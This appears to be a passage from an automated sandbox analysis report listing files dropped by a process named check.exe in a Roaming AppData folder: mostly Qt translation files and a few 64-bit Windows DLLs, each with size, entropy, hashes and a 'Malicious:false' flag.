                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165170
                                                                                                                                                                                                                                      Entropy (8bit):4.679910767547088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                                                      MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                                                      SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                                                      SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                                                      SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):179941
                                                                                                                                                                                                                                      Entropy (8bit):4.720938209922096
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                                                      MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                                                      SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                                                      SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                                                      SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):166167
                                                                                                                                                                                                                                      Entropy (8bit):4.685212271435657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                                                      MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                                                      SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                                                      SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                                                      SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):189580
                                                                                                                                                                                                                                      Entropy (8bit):4.630160941635514
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                                                      MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                                                      SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                                                      SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                                                      SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):138690
                                                                                                                                                                                                                                      Entropy (8bit):5.515748942553918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                                                      MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                                                      SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                                                      SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                                                      SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160494
                                                                                                                                                                                                                                      Entropy (8bit):4.831791320613137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                                                      MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                                                      SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                                                      SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                                                      SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161172
                                                                                                                                                                                                                                      Entropy (8bit):4.680034416311688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                                                      MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                                                      SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                                                      SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                                                      SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):129911
                                                                                                                                                                                                                                      Entropy (8bit):5.802855391832282
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                                                      MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                                                      SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                                                      SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                                                      SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):156799
                                                                                                                                                                                                                                      Entropy (8bit):5.859529082176036
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                                                      MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                                                      SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                                                      SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                                                      SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153608
                                                                                                                                                                                                                                      Entropy (8bit):4.843805801051326
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                                                      MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                                                      SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                                                      SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                                                      SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):162982
                                                                                                                                                                                                                                      Entropy (8bit):4.841899887077422
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                                                      MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                                                      SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                                                      SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                                                      SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):203767
                                                                                                                                                                                                                                      Entropy (8bit):5.362551648909705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                                                      MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                                                      SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                                                      SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                                                      SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):125763
                                                                                                                                                                                                                                      Entropy (8bit):4.80343609423322
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                                                      MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                                                      SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                                                      SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                                                      SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):194487
                                                                                                                                                                                                                                      Entropy (8bit):4.877239354585035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                                                      MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                                                      SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                                                      SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                                                      SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):158274
                                                                                                                                                                                                                                      Entropy (8bit):5.402056706327934
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                                                      MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                                                      SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                                                      SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                                                      SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):127849
                                                                                                                                                                                                                                      Entropy (8bit):5.83455389078597
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                                                      MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                                                      SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                                                      SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                                                      SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                                                                                      Entropy (8bit):6.241719144701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                                                      MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                                                      SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                                                      SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                                                      SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2494976
                                                                                                                                                                                                                                      Entropy (8bit):6.232020603277999
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                                                      MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                                                      SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                                                      SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                                                      SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5144576
                                                                                                                                                                                                                                      Entropy (8bit):6.262739223310643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
